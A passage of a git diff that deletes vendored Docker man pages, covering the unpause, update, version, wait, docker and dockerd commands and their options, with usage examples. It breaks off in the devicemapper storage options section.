+0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% JUNE 2014 -# NAME -docker-unpause - Unpause all processes within one or more containers - -# SYNOPSIS -**docker unpause** -CONTAINER [CONTAINER...] 
- -# DESCRIPTION - -The `docker unpause` command un-suspends all processes in the specified containers. -On Linux, it does this using the cgroups freezer. - -See the [cgroups freezer documentation] -(https://www.kernel.org/doc/Documentation/cgroup-v1/freezer-subsystem.txt) for -further details. - -# OPTIONS -**--help** - Print usage statement - -# See also -**docker-pause(1)** to pause all processes within one or more containers. - -# HISTORY -June 2014, updated by Sven Dowideit diff --git a/vendor/github.com/docker/docker/man/docker-update.1.md b/vendor/github.com/docker/docker/man/docker-update.1.md deleted file mode 100644 index 85f3dd07c1..0000000000 --- a/vendor/github.com/docker/docker/man/docker-update.1.md +++ /dev/null @@ -1,171 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% JUNE 2014 -# NAME -docker-update - Update configuration of one or more containers - -# SYNOPSIS -**docker update** -[**--blkio-weight**[=*[BLKIO-WEIGHT]*]] -[**--cpu-shares**[=*0*]] -[**--cpu-period**[=*0*]] -[**--cpu-quota**[=*0*]] -[**--cpu-rt-period**[=*0*]] -[**--cpu-rt-runtime**[=*0*]] -[**--cpuset-cpus**[=*CPUSET-CPUS*]] -[**--cpuset-mems**[=*CPUSET-MEMS*]] -[**--help**] -[**--kernel-memory**[=*KERNEL-MEMORY*]] -[**-m**|**--memory**[=*MEMORY*]] -[**--memory-reservation**[=*MEMORY-RESERVATION*]] -[**--memory-swap**[=*MEMORY-SWAP*]] -[**--restart**[=*""*]] -CONTAINER [CONTAINER...] - -# DESCRIPTION - -The **docker update** command dynamically updates container configuration. -You can use this command to prevent containers from consuming too many -resources from their Docker host. With a single command, you can place -limits on a single container or on many. To specify more than one container, -provide space-separated list of container names or IDs. - -With the exception of the **--kernel-memory** option, you can specify these -options on a running or a stopped container. 
On kernel version older than -4.6, You can only update **--kernel-memory** on a stopped container or on -a running container with kernel memory initialized. - -# OPTIONS - -**--blkio-weight**=0 - Block IO weight (relative weight) accepts a weight value between 10 and 1000. - -**--cpu-shares**=0 - CPU shares (relative weight) - -**--cpu-period**=0 - Limit the CPU CFS (Completely Fair Scheduler) period - - Limit the container's CPU usage. This flag tell the kernel to restrict the container's CPU usage to the period you specify. - -**--cpu-quota**=0 - Limit the CPU CFS (Completely Fair Scheduler) quota - -**--cpu-rt-period**=0 - Limit the CPU real-time period in microseconds - - Limit the container's Real Time CPU usage. This flag tell the kernel to restrict the container's Real Time CPU usage to the period you specify. - -**--cpu-rt-runtime**=0 - Limit the CPU real-time runtime in microseconds - - Limit the containers Real Time CPU usage. This flag tells the kernel to limit the amount of time in a given CPU period Real Time tasks may consume. Ex: - Period of 1,000,000us and Runtime of 950,000us means that this container could consume 95% of available CPU and leave the remaining 5% to normal priority tasks. - - The sum of all runtimes across containers cannot exceed the amount allotted to the parent cgroup. - -**--cpuset-cpus**="" - CPUs in which to allow execution (0-3, 0,1) - -**--cpuset-mems**="" - Memory nodes(MEMs) in which to allow execution (0-3, 0,1). Only effective on NUMA systems. - -**--help** - Print usage statement - -**--kernel-memory**="" - Kernel memory limit (format: `[]`, where unit = b, k, m or g) - - Note that on kernel version older than 4.6, you can not update kernel memory on - a running container if the container is started without kernel memory initialized, - in this case, it can only be updated after it's stopped. The new setting takes - effect when the container is started. 
- -**-m**, **--memory**="" - Memory limit (format: , where unit = b, k, m or g) - - Note that the memory should be smaller than the already set swap memory limit. - If you want update a memory limit bigger than the already set swap memory limit, - you should update swap memory limit at the same time. If you don't set swap memory - limit on docker create/run but only memory limit, the swap memory is double - the memory limit. - -**--memory-reservation**="" - Memory soft limit (format: [], where unit = b, k, m or g) - -**--memory-swap**="" - Total memory limit (memory + swap) - -**--restart**="" - Restart policy to apply when a container exits (no, on-failure[:max-retry], always, unless-stopped). - -# EXAMPLES - -The following sections illustrate ways to use this command. - -### Update a container's cpu-shares - -To limit a container's cpu-shares to 512, first identify the container -name or ID. You can use **docker ps** to find these values. You can also -use the ID returned from the **docker run** command. Then, do the following: - -```bash -$ docker update --cpu-shares 512 abebf7571666 -``` - -### Update a container with cpu-shares and memory - -To update multiple resource configurations for multiple containers: - -```bash -$ docker update --cpu-shares 512 -m 300M abebf7571666 hopeful_morse -``` - -### Update a container's kernel memory constraints - -You can update a container's kernel memory limit using the **--kernel-memory** -option. On kernel version older than 4.6, this option can be updated on a -running container only if the container was started with **--kernel-memory**. -If the container was started *without* **--kernel-memory** you need to stop -the container before updating kernel memory. 
- -For example, if you started a container with this command: - -```bash -$ docker run -dit --name test --kernel-memory 50M ubuntu bash -``` - -You can update kernel memory while the container is running: - -```bash -$ docker update --kernel-memory 80M test -``` - -If you started a container *without* kernel memory initialized: - -```bash -$ docker run -dit --name test2 --memory 300M ubuntu bash -``` - -Update kernel memory of running container `test2` will fail. You need to stop -the container before updating the **--kernel-memory** setting. The next time you -start it, the container uses the new value. - -Kernel version newer than (include) 4.6 does not have this limitation, you -can use `--kernel-memory` the same way as other options. - -### Update a container's restart policy - -You can change a container's restart policy on a running container. The new -restart policy takes effect instantly after you run `docker update` on a -container. - -To update restart policy for one or more containers: - -```bash -$ docker update --restart=on-failure:3 abebf7571666 hopeful_morse -``` - -Note that if the container is started with "--rm" flag, you cannot update the restart -policy for it. The `AutoRemove` and `RestartPolicy` are mutually exclusive for the -container. diff --git a/vendor/github.com/docker/docker/man/docker-version.1.md b/vendor/github.com/docker/docker/man/docker-version.1.md deleted file mode 100644 index 1838f82052..0000000000 --- a/vendor/github.com/docker/docker/man/docker-version.1.md +++ /dev/null @@ -1,62 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% JUNE 2015 -# NAME -docker-version - Show the Docker version information. - -# SYNOPSIS -**docker version** -[**--help**] -[**-f**|**--format**[=*FORMAT*]] - -# DESCRIPTION -This command displays version information for both the Docker client and -daemon. - -# OPTIONS -**--help** - Print usage statement - -**-f**, **--format**="" - Format the output using the given Go template. 
- -# EXAMPLES - -## Display Docker version information - -The default output: - - $ docker version - Client: - Version: 1.8.0 - API version: 1.20 - Go version: go1.4.2 - Git commit: f5bae0a - Built: Tue Jun 23 17:56:00 UTC 2015 - OS/Arch: linux/amd64 - - Server: - Version: 1.8.0 - API version: 1.20 - Go version: go1.4.2 - Git commit: f5bae0a - Built: Tue Jun 23 17:56:00 UTC 2015 - OS/Arch: linux/amd64 - -Get server version: - - $ docker version --format '{{.Server.Version}}' - 1.8.0 - -Dump raw data: - -To view all available fields, you can use the format `{{json .}}`. - - $ docker version --format '{{json .}}' - {"Client":{"Version":"1.8.0","ApiVersion":"1.20","GitCommit":"f5bae0a","GoVersion":"go1.4.2","Os":"linux","Arch":"amd64","BuildTime":"Tue Jun 23 17:56:00 UTC 2015"},"ServerOK":true,"Server":{"Version":"1.8.0","ApiVersion":"1.20","GitCommit":"f5bae0a","GoVersion":"go1.4.2","Os":"linux","Arch":"amd64","KernelVersion":"3.13.2-gentoo","BuildTime":"Tue Jun 23 17:56:00 UTC 2015"}} - - -# HISTORY -June 2014, updated by Sven Dowideit -June 2015, updated by John Howard -June 2015, updated by Patrick Hemmer diff --git a/vendor/github.com/docker/docker/man/docker-wait.1.md b/vendor/github.com/docker/docker/man/docker-wait.1.md deleted file mode 100644 index 678800966b..0000000000 --- a/vendor/github.com/docker/docker/man/docker-wait.1.md +++ /dev/null @@ -1,30 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% JUNE 2014 -# NAME -docker-wait - Block until one or more containers stop, then print their exit codes - -# SYNOPSIS -**docker wait** -[**--help**] -CONTAINER [CONTAINER...] - -# DESCRIPTION - -Block until one or more containers stop, then print their exit codes. 
- -# OPTIONS -**--help** - Print usage statement - -# EXAMPLES - - $ docker run -d fedora sleep 99 - 079b83f558a2bc52ecad6b2a5de13622d584e6bb1aea058c11b36511e85e7622 - $ docker wait 079b83f558a2bc - 0 - -# HISTORY -April 2014, Originally compiled by William Henry (whenry at redhat dot com) -based on docker.com source material and internal work. -June 2014, updated by Sven Dowideit diff --git a/vendor/github.com/docker/docker/man/docker.1.md b/vendor/github.com/docker/docker/man/docker.1.md deleted file mode 100644 index 2a96184439..0000000000 --- a/vendor/github.com/docker/docker/man/docker.1.md +++ /dev/null @@ -1,237 +0,0 @@ -% DOCKER(1) Docker User Manuals -% William Henry -% APRIL 2014 -# NAME -docker \- Docker image and container command line interface - -# SYNOPSIS -**docker** [OPTIONS] COMMAND [ARG...] - -**docker** daemon [--help|...] - -**docker** [--help|-v|--version] - -# DESCRIPTION -is a client for interacting with the daemon (see **dockerd(8)**) through the CLI. - -The Docker CLI has over 30 commands. The commands are listed below and each has -its own man page which explain usage and arguments. - -To see the man page for a command run **man docker **. - -# OPTIONS -**--help** - Print usage statement - -**--config**="" - Specifies the location of the Docker client configuration files. The default is '~/.docker'. - -**-D**, **--debug**=*true*|*false* - Enable debug mode. Default is false. - -**-H**, **--host**=[*unix:///var/run/docker.sock*]: tcp://[host]:[port][path] to bind or -unix://[/path/to/socket] to use. - The socket(s) to bind to in daemon mode specified using one or more - tcp://host:port/path, unix:///path/to/socket, fd://* or fd://socketfd. - If the tcp port is not specified, then it will default to either `2375` when - `--tls` is off, or `2376` when `--tls` is on, or `--tlsverify` is specified. - -**-l**, **--log-level**="*debug*|*info*|*warn*|*error*|*fatal*" - Set the logging level. Default is `info`. 
- -**--tls**=*true*|*false* - Use TLS; implied by --tlsverify. Default is false. - -**--tlscacert**=*~/.docker/ca.pem* - Trust certs signed only by this CA. - -**--tlscert**=*~/.docker/cert.pem* - Path to TLS certificate file. - -**--tlskey**=*~/.docker/key.pem* - Path to TLS key file. - -**--tlsverify**=*true*|*false* - Use TLS and verify the remote (daemon: verify client, client: verify daemon). - Default is false. - -**-v**, **--version**=*true*|*false* - Print version information and quit. Default is false. - -# COMMANDS -**attach** - Attach to a running container - See **docker-attach(1)** for full documentation on the **attach** command. - -**build** - Build an image from a Dockerfile - See **docker-build(1)** for full documentation on the **build** command. - -**commit** - Create a new image from a container's changes - See **docker-commit(1)** for full documentation on the **commit** command. - -**cp** - Copy files/folders between a container and the local filesystem - See **docker-cp(1)** for full documentation on the **cp** command. - -**create** - Create a new container - See **docker-create(1)** for full documentation on the **create** command. - -**diff** - Inspect changes on a container's filesystem - See **docker-diff(1)** for full documentation on the **diff** command. - -**events** - Get real time events from the server - See **docker-events(1)** for full documentation on the **events** command. - -**exec** - Run a command in a running container - See **docker-exec(1)** for full documentation on the **exec** command. - -**export** - Stream the contents of a container as a tar archive - See **docker-export(1)** for full documentation on the **export** command. - -**history** - Show the history of an image - See **docker-history(1)** for full documentation on the **history** command. - -**images** - List images - See **docker-images(1)** for full documentation on the **images** command. 
- -**import** - Create a new filesystem image from the contents of a tarball - See **docker-import(1)** for full documentation on the **import** command. - -**info** - Display system-wide information - See **docker-info(1)** for full documentation on the **info** command. - -**inspect** - Return low-level information on a container or image - See **docker-inspect(1)** for full documentation on the **inspect** command. - -**kill** - Kill a running container (which includes the wrapper process and everything -inside it) - See **docker-kill(1)** for full documentation on the **kill** command. - -**load** - Load an image from a tar archive - See **docker-load(1)** for full documentation on the **load** command. - -**login** - Log in to a Docker Registry - See **docker-login(1)** for full documentation on the **login** command. - -**logout** - Log the user out of a Docker Registry - See **docker-logout(1)** for full documentation on the **logout** command. - -**logs** - Fetch the logs of a container - See **docker-logs(1)** for full documentation on the **logs** command. - -**pause** - Pause all processes within a container - See **docker-pause(1)** for full documentation on the **pause** command. - -**port** - Lookup the public-facing port which is NAT-ed to PRIVATE_PORT - See **docker-port(1)** for full documentation on the **port** command. - -**ps** - List containers - See **docker-ps(1)** for full documentation on the **ps** command. - -**pull** - Pull an image or a repository from a Docker Registry - See **docker-pull(1)** for full documentation on the **pull** command. - -**push** - Push an image or a repository to a Docker Registry - See **docker-push(1)** for full documentation on the **push** command. - -**rename** - Rename a container. - See **docker-rename(1)** for full documentation on the **rename** command. - -**restart** - Restart one or more containers - See **docker-restart(1)** for full documentation on the **restart** command. 
- -**rm** - Remove one or more containers - See **docker-rm(1)** for full documentation on the **rm** command. - -**rmi** - Remove one or more images - See **docker-rmi(1)** for full documentation on the **rmi** command. - -**run** - Run a command in a new container - See **docker-run(1)** for full documentation on the **run** command. - -**save** - Save an image to a tar archive - See **docker-save(1)** for full documentation on the **save** command. - -**search** - Search for an image in the Docker index - See **docker-search(1)** for full documentation on the **search** command. - -**start** - Start a container - See **docker-start(1)** for full documentation on the **start** command. - -**stats** - Display a live stream of one or more containers' resource usage statistics - See **docker-stats(1)** for full documentation on the **stats** command. - -**stop** - Stop a container - See **docker-stop(1)** for full documentation on the **stop** command. - -**tag** - Tag an image into a repository - See **docker-tag(1)** for full documentation on the **tag** command. - -**top** - Lookup the running processes of a container - See **docker-top(1)** for full documentation on the **top** command. - -**unpause** - Unpause all processes within a container - See **docker-unpause(1)** for full documentation on the **unpause** command. - -**version** - Show the Docker version information - See **docker-version(1)** for full documentation on the **version** command. - -**wait** - Block until a container stops, then print its exit code - See **docker-wait(1)** for full documentation on the **wait** command. - - -# RUNTIME EXECUTION OPTIONS - -Use the **--exec-opt** flags to specify options to the execution driver. -The following options are available: - -#### native.cgroupdriver -Specifies the management of the container's `cgroups`. You can specify `cgroupfs` -or `systemd`. If you specify `systemd` and it is not available, the system errors -out. 
- -#### Client -For specific client examples please see the man page for the specific Docker -command. For example: - - man docker-run - -# HISTORY -April 2014, Originally compiled by William Henry (whenry at redhat dot com) based on docker.com source material and internal work. diff --git a/vendor/github.com/docker/docker/man/dockerd.8.md b/vendor/github.com/docker/docker/man/dockerd.8.md deleted file mode 100644 index 761dc6b9be..0000000000 --- a/vendor/github.com/docker/docker/man/dockerd.8.md +++ /dev/null @@ -1,710 +0,0 @@ -% DOCKER(8) Docker User Manuals -% Shishir Mahajan -% SEPTEMBER 2015 -# NAME -dockerd - Enable daemon mode - -# SYNOPSIS -**dockerd** -[**--add-runtime**[=*[]*]] -[**--api-cors-header**=[=*API-CORS-HEADER*]] -[**--authorization-plugin**[=*[]*]] -[**-b**|**--bridge**[=*BRIDGE*]] -[**--bip**[=*BIP*]] -[**--cgroup-parent**[=*[]*]] -[**--cluster-store**[=*[]*]] -[**--cluster-advertise**[=*[]*]] -[**--cluster-store-opt**[=*map[]*]] -[**--config-file**[=*/etc/docker/daemon.json*]] -[**--containerd**[=*SOCKET-PATH*]] -[**-D**|**--debug**] -[**--default-gateway**[=*DEFAULT-GATEWAY*]] -[**--default-gateway-v6**[=*DEFAULT-GATEWAY-V6*]] -[**--default-runtime**[=*runc*]] -[**--default-ulimit**[=*[]*]] -[**--disable-legacy-registry**] -[**--dns**[=*[]*]] -[**--dns-opt**[=*[]*]] -[**--dns-search**[=*[]*]] -[**--exec-opt**[=*[]*]] -[**--exec-root**[=*/var/run/docker*]] -[**--experimental**[=*false*]] -[**--fixed-cidr**[=*FIXED-CIDR*]] -[**--fixed-cidr-v6**[=*FIXED-CIDR-V6*]] -[**-G**|**--group**[=*docker*]] -[**-g**|**--graph**[=*/var/lib/docker*]] -[**-H**|**--host**[=*[]*]] -[**--help**] -[**--icc**[=*true*]] -[**--init**[=*false*]] -[**--init-path**[=*""*]] -[**--insecure-registry**[=*[]*]] -[**--ip**[=*0.0.0.0*]] -[**--ip-forward**[=*true*]] -[**--ip-masq**[=*true*]] -[**--iptables**[=*true*]] -[**--ipv6**] -[**--isolation**[=*default*]] -[**-l**|**--log-level**[=*info*]] -[**--label**[=*[]*]] -[**--live-restore**[=*false*]] 
-[**--log-driver**[=*json-file*]] -[**--log-opt**[=*map[]*]] -[**--mtu**[=*0*]] -[**--max-concurrent-downloads**[=*3*]] -[**--max-concurrent-uploads**[=*5*]] -[**-p**|**--pidfile**[=*/var/run/docker.pid*]] -[**--raw-logs**] -[**--registry-mirror**[=*[]*]] -[**-s**|**--storage-driver**[=*STORAGE-DRIVER*]] -[**--seccomp-profile**[=*SECCOMP-PROFILE-PATH*]] -[**--selinux-enabled**] -[**--shutdown-timeout**[=*15*]] -[**--storage-opt**[=*[]*]] -[**--swarm-default-advertise-addr**[=*IP|INTERFACE*]] -[**--tls**] -[**--tlscacert**[=*~/.docker/ca.pem*]] -[**--tlscert**[=*~/.docker/cert.pem*]] -[**--tlskey**[=*~/.docker/key.pem*]] -[**--tlsverify**] -[**--userland-proxy**[=*true*]] -[**--userland-proxy-path**[=*""*]] -[**--userns-remap**[=*default*]] - -# DESCRIPTION -**dockerd** is used for starting the Docker daemon (i.e., to command the daemon -to manage images, containers etc). So **dockerd** is a server, as a daemon. - -To run the Docker daemon you can specify **dockerd**. -You can check the daemon options using **dockerd --help**. -Daemon options should be specified after the **dockerd** keyword in the -following format. - -**dockerd [OPTIONS]** - -# OPTIONS - -**--add-runtime**=[] - Runtimes can be registered with the daemon either via the -configuration file or using the `--add-runtime` command line argument. - - The following is an example adding 2 runtimes via the configuration: - -```json -{ - "default-runtime": "runc", - "runtimes": { - "runc": { - "path": "runc" - }, - "custom": { - "path": "/usr/local/bin/my-runc-replacement", - "runtimeArgs": [ - "--debug" - ] - } - } -} -``` - - This is the same example via the command line: - -```bash -$ sudo dockerd --add-runtime runc=runc --add-runtime custom=/usr/local/bin/my-runc-replacement -``` - - **Note**: defining runtime arguments via the command line is not supported. - -**--api-cors-header**="" - Set CORS headers in the Engine API. Default is cors disabled. Give urls like - "http://foo, http://bar, ...". 
Give "*" to allow all. - -**--authorization-plugin**="" - Set authorization plugins to load - -**-b**, **--bridge**="" - Attach containers to a pre\-existing network bridge; use 'none' to disable - container networking - -**--bip**="" - Use the provided CIDR notation address for the dynamically created bridge - (docker0); Mutually exclusive of \-b - -**--cgroup-parent**="" - Set parent cgroup for all containers. Default is "/docker" for fs cgroup - driver and "system.slice" for systemd cgroup driver. - -**--cluster-store**="" - URL of the distributed storage backend - -**--cluster-advertise**="" - Specifies the 'host:port' or `interface:port` combination that this - particular daemon instance should use when advertising itself to the cluster. - The daemon is reached through this value. - -**--cluster-store-opt**="" - Specifies options for the Key/Value store. - -**--config-file**="/etc/docker/daemon.json" - Specifies the JSON file path to load the configuration from. - -**--containerd**="" - Path to containerd socket. - -**-D**, **--debug**=*true*|*false* - Enable debug mode. Default is false. - -**--default-gateway**="" - IPv4 address of the container default gateway; this address must be part of - the bridge subnet (which is defined by \-b or \--bip) - -**--default-gateway-v6**="" - IPv6 address of the container default gateway - -**--default-runtime**="runc" - Set default runtime if there're more than one specified by `--add-runtime`. - -**--default-ulimit**=[] - Default ulimits for containers. - -**--disable-legacy-registry**=*true*|*false* - Disable contacting legacy registries - -**--dns**="" - Force Docker to use specific DNS servers - -**--dns-opt**="" - DNS options to use. - -**--dns-search**=[] - DNS search domains to use. - -**--exec-opt**=[] - Set runtime execution options. See RUNTIME EXECUTION OPTIONS. - -**--exec-root**="" - Path to use as the root of the Docker execution state files. Default is - `/var/run/docker`. 
- -**--experimental**="" - Enable the daemon experimental features. - -**--fixed-cidr**="" - IPv4 subnet for fixed IPs (e.g., 10.20.0.0/16); this subnet must be nested in - the bridge subnet (which is defined by \-b or \-\-bip). - -**--fixed-cidr-v6**="" - IPv6 subnet for global IPv6 addresses (e.g., 2a00:1450::/64) - -**-G**, **--group**="" - Group to assign the unix socket specified by -H when running in daemon mode. - use '' (the empty string) to disable setting of a group. Default is `docker`. - -**-g**, **--graph**="" - Path to use as the root of the Docker runtime. Default is `/var/lib/docker`. - -**-H**, **--host**=[*unix:///var/run/docker.sock*]: tcp://[host:port] to bind or -unix://[/path/to/socket] to use. - The socket(s) to bind to in daemon mode specified using one or more - tcp://host:port, unix:///path/to/socket, fd://* or fd://socketfd. - -**--help** - Print usage statement - -**--icc**=*true*|*false* - Allow unrestricted inter\-container and Docker daemon host communication. If - disabled, containers can still be linked together using the **--link** option - (see **docker-run(1)**). Default is true. - -**--init** - Run an init process inside containers for signal forwarding and process - reaping. - -**--init-path** - Path to the docker-init binary. - -**--insecure-registry**=[] - Enable insecure registry communication, i.e., enable un-encrypted and/or - untrusted communication. - - List of insecure registries can contain an element with CIDR notation to - specify a whole subnet. Insecure registries accept HTTP and/or accept HTTPS - with certificates from unknown CAs. - - Enabling `--insecure-registry` is useful when running a local registry. - However, because its use creates security vulnerabilities it should ONLY be - enabled for testing purposes. For increased security, users should add their - CA to their system's list of trusted CAs instead of using - `--insecure-registry`. 
- -**--ip**="" - Default IP address to use when binding container ports. Default is `0.0.0.0`. - -**--ip-forward**=*true*|*false* - Enables IP forwarding on the Docker host. The default is `true`. This flag - interacts with the IP forwarding setting on your host system's kernel. If - your system has IP forwarding disabled, this setting enables it. If your - system has IP forwarding enabled, setting this flag to `--ip-forward=false` - has no effect. - - This setting will also enable IPv6 forwarding if you have both - `--ip-forward=true` and `--fixed-cidr-v6` set. Note that this may reject - Router Advertisements and interfere with the host's existing IPv6 - configuration. For more information, please consult the documentation about - "Advanced Networking - IPv6". - -**--ip-masq**=*true*|*false* - Enable IP masquerading for bridge's IP range. Default is true. - -**--iptables**=*true*|*false* - Enable Docker's addition of iptables rules. Default is true. - -**--ipv6**=*true*|*false* - Enable IPv6 support. Default is false. Docker will create an IPv6-enabled - bridge with address fe80::1 which will allow you to create IPv6-enabled - containers. Use together with `--fixed-cidr-v6` to provide globally routable - IPv6 addresses. IPv6 forwarding will be enabled if not used with - `--ip-forward=false`. This may collide with your host's current IPv6 - settings. For more information please consult the documentation about - "Advanced Networking - IPv6". - -**--isolation**="*default*" - Isolation specifies the type of isolation technology used by containers. - Note that the default on Windows server is `process`, and the default on - Windows client is `hyperv`. Linux only supports `default`. - -**-l**, **--log-level**="*debug*|*info*|*warn*|*error*|*fatal*" - Set the logging level. Default is `info`. 
- -**--label**="[]" - Set key=value labels to the daemon (displayed in `docker info`) - -**--live-restore**=*false* - Enable live restore of running containers when the daemon starts so that they - are not restarted. This option is applicable only for docker daemon running - on Linux host. - -**--log-driver**="*json-file*|*syslog*|*journald*|*gelf*|*fluentd*|*awslogs*|*splunk*|*etwlogs*|*gcplogs*|*none*" - Default driver for container logs. Default is `json-file`. - **Warning**: `docker logs` command works only for `json-file` logging driver. - -**--log-opt**=[] - Logging driver specific options. - -**--mtu**=*0* - Set the containers network mtu. Default is `0`. - -**--max-concurrent-downloads**=*3* - Set the max concurrent downloads for each pull. Default is `3`. - -**--max-concurrent-uploads**=*5* - Set the max concurrent uploads for each push. Default is `5`. - -**-p**, **--pidfile**="" - Path to use for daemon PID file. Default is `/var/run/docker.pid` - -**--raw-logs** - Output daemon logs in full timestamp format without ANSI coloring. If this - flag is not set, the daemon outputs condensed, colorized logs if a terminal - is detected, or full ("raw") output otherwise. - -**--registry-mirror**=*://* - Prepend a registry mirror to be used for image pulls. May be specified - multiple times. - -**-s**, **--storage-driver**="" - Force the Docker runtime to use a specific storage driver. - -**--seccomp-profile**="" - Path to seccomp profile. - -**--selinux-enabled**=*true*|*false* - Enable selinux support. Default is false. - -**--shutdown-timeout**=*15* - Set the shutdown timeout value in seconds. Default is `15`. - -**--storage-opt**=[] - Set storage driver options. See STORAGE DRIVER OPTIONS. - -**--swarm-default-advertise-addr**=*IP|INTERFACE* - Set default address or interface for swarm to advertise as its - externally-reachable address to other cluster members. This can be a - hostname, an IP address, or an interface such as `eth0`. 
A port cannot be - specified with this option. - -**--tls**=*true*|*false* - Use TLS; implied by --tlsverify. Default is false. - -**--tlscacert**=*~/.docker/ca.pem* - Trust certs signed only by this CA. - -**--tlscert**=*~/.docker/cert.pem* - Path to TLS certificate file. - -**--tlskey**=*~/.docker/key.pem* - Path to TLS key file. - -**--tlsverify**=*true*|*false* - Use TLS and verify the remote (daemon: verify client, client: verify daemon). - Default is false. - -**--userland-proxy**=*true*|*false* - Rely on a userland proxy implementation for inter-container and - outside-to-container loopback communications. Default is true. - -**--userland-proxy-path**="" - Path to the userland proxy binary. - -**--userns-remap**=*default*|*uid:gid*|*user:group*|*user*|*uid* - Enable user namespaces for containers on the daemon. Specifying "default" - will cause a new user and group to be created to handle UID and GID range - remapping for the user namespace mappings used for contained processes. - Specifying a user (or uid) and optionally a group (or gid) will cause the - daemon to lookup the user and group's subordinate ID ranges for use as the - user namespace mappings for contained processes. - -# STORAGE DRIVER OPTIONS - -Docker uses storage backends (known as "graphdrivers" in the Docker -internals) to create writable containers from images. Many of these -backends use operating system level technologies and can be -configured. - -Specify options to the storage backend with **--storage-opt** flags. The -backends that currently take options are *devicemapper*, *zfs* and *btrfs*. -Options for *devicemapper* are prefixed with *dm*, options for *zfs* -start with *zfs* and options for *btrfs* start with *btrfs*. - -Specifically for devicemapper, the default is a "loopback" model which -requires no pre-configuration, but is extremely inefficient. Do not -use it in production. 
- -To make the best use of Docker with the devicemapper backend, you must -have a recent version of LVM. Use `lvm` to create a thin pool; for -more information see `man lvmthin`. Then, use `--storage-opt -dm.thinpooldev` to tell the Docker engine to use that pool for -allocating images and container snapshots. - -## Devicemapper options - -#### dm.thinpooldev - -Specifies a custom block storage device to use for the thin pool. - -If using a block device for device mapper storage, it is best to use `lvm` -to create and manage the thin-pool volume. This volume is then handed to Docker -to exclusively create snapshot volumes needed for images and containers. - -Managing the thin-pool outside of Engine makes for the most feature-rich -method of having Docker utilize device mapper thin provisioning as the -backing storage for Docker containers. The highlights of the lvm-based -thin-pool management feature include: automatic or interactive thin-pool -resize support, dynamically changing thin-pool features, automatic thinp -metadata checking when lvm activates the thin-pool, etc. - -As a fallback if no thin pool is provided, loopback files are -created. Loopback is very slow, but can be used without any -pre-configuration of storage. It is strongly recommended that you do -not use loopback in production. Ensure your Engine daemon has a -`--storage-opt dm.thinpooldev` argument provided. - -Example use: - - $ dockerd \ - --storage-opt dm.thinpooldev=/dev/mapper/thin-pool - -#### dm.basesize - -Specifies the size to use when creating the base device, which limits -the size of images and containers. The default value is 10G. Note, -thin devices are inherently "sparse", so a 10G device which is mostly -empty doesn't use 10 GB of space on the pool. However, the filesystem -will use more space for base images the larger the device -is. 
- -The base device size can be increased at daemon restart which will allow -all future images and containers (based on those new images) to be of the -new base device size. - -Example use: `dockerd --storage-opt dm.basesize=50G` - -This will increase the base device size to 50G. The Docker daemon will throw an -error if existing base device size is larger than 50G. A user can use -this option to expand the base device size however shrinking is not permitted. - -This value affects the system-wide "base" empty filesystem that may already -be initialized and inherited by pulled images. Typically, a change to this -value requires additional steps to take effect: - - $ sudo service docker stop - $ sudo rm -rf /var/lib/docker - $ sudo service docker start - -Example use: `dockerd --storage-opt dm.basesize=20G` - -#### dm.fs - -Specifies the filesystem type to use for the base device. The -supported options are `ext4` and `xfs`. The default is `ext4`. - -Example use: `dockerd --storage-opt dm.fs=xfs` - -#### dm.mkfsarg - -Specifies extra mkfs arguments to be used when creating the base device. - -Example use: `dockerd --storage-opt "dm.mkfsarg=-O ^has_journal"` - -#### dm.mountopt - -Specifies extra mount options used when mounting the thin devices. - -Example use: `dockerd --storage-opt dm.mountopt=nodiscard` - -#### dm.use_deferred_removal - -Enables use of deferred device removal if `libdm` and the kernel driver -support the mechanism. - -Deferred device removal means that if device is busy when devices are -being removed/deactivated, then a deferred removal is scheduled on -device. And devices automatically go away when last user of the device -exits. - -For example, when a container exits, its associated thin device is removed. If -that device has leaked into some other mount namespace and can't be removed, -the container exit still succeeds and this option causes the system to schedule -the device for deferred removal. 
It does not wait in a loop trying to remove a -busy device. - -Example use: `dockerd --storage-opt dm.use_deferred_removal=true` - -#### dm.use_deferred_deletion - -Enables use of deferred device deletion for thin pool devices. By default, -thin pool device deletion is synchronous. Before a container is deleted, the -Docker daemon removes any associated devices. If the storage driver can not -remove a device, the container deletion fails and daemon returns. - -`Error deleting container: Error response from daemon: Cannot destroy container` - -To avoid this failure, enable both deferred device deletion and deferred -device removal on the daemon. - -`dockerd --storage-opt dm.use_deferred_deletion=true --storage-opt dm.use_deferred_removal=true` - -With these two options enabled, if a device is busy when the driver is -deleting a container, the driver marks the device as deleted. Later, when the -device isn't in use, the driver deletes it. - -In general it should be safe to enable this option by default. It will help -when unintentional leaking of mount point happens across multiple mount -namespaces. - -#### dm.loopdatasize - -**Note**: This option configures devicemapper loopback, which should not be -used in production. - -Specifies the size to use when creating the loopback file for the "data" device -which is used for the thin pool. The default size is 100G. The file is sparse, -so it will not initially take up this much space. - -Example use: `dockerd --storage-opt dm.loopdatasize=200G` - -#### dm.loopmetadatasize - -**Note**: This option configures devicemapper loopback, which should not be -used in production. - -Specifies the size to use when creating the loopback file for the "metadata" -device which is used for the thin pool. The default size is 2G. The file is -sparse, so it will not initially take up this much space. 
- -Example use: `dockerd --storage-opt dm.loopmetadatasize=4G` - -#### dm.datadev - -(Deprecated, use `dm.thinpooldev`) - -Specifies a custom blockdevice to use for data for a Docker-managed thin pool. -It is better to use `dm.thinpooldev` - see the documentation for it above for -discussion of the advantages. - -#### dm.metadatadev - -(Deprecated, use `dm.thinpooldev`) - -Specifies a custom blockdevice to use for metadata for a Docker-managed thin -pool. See `dm.datadev` for why this is deprecated. - -#### dm.blocksize - -Specifies a custom blocksize to use for the thin pool. The default -blocksize is 64K. - -Example use: `dockerd --storage-opt dm.blocksize=512K` - -#### dm.blkdiscard - -Enables or disables the use of `blkdiscard` when removing devicemapper devices. -This is disabled by default due to the additional latency, but as a special -case with loopback devices it will be enabled, in order to re-sparsify the -loopback file on image/container removal. - -Disabling this on loopback can lead to *much* faster container removal times, -but it also prevents the space used in `/var/lib/docker` directory from being -returned to the system for other use when containers are removed. - -Example use: `dockerd --storage-opt dm.blkdiscard=false` - -#### dm.override_udev_sync_check - -By default, the devicemapper backend attempts to synchronize with the `udev` -device manager for the Linux kernel. This option allows disabling that -synchronization, to continue even though the configuration may be buggy. - -To view the `udev` sync support of 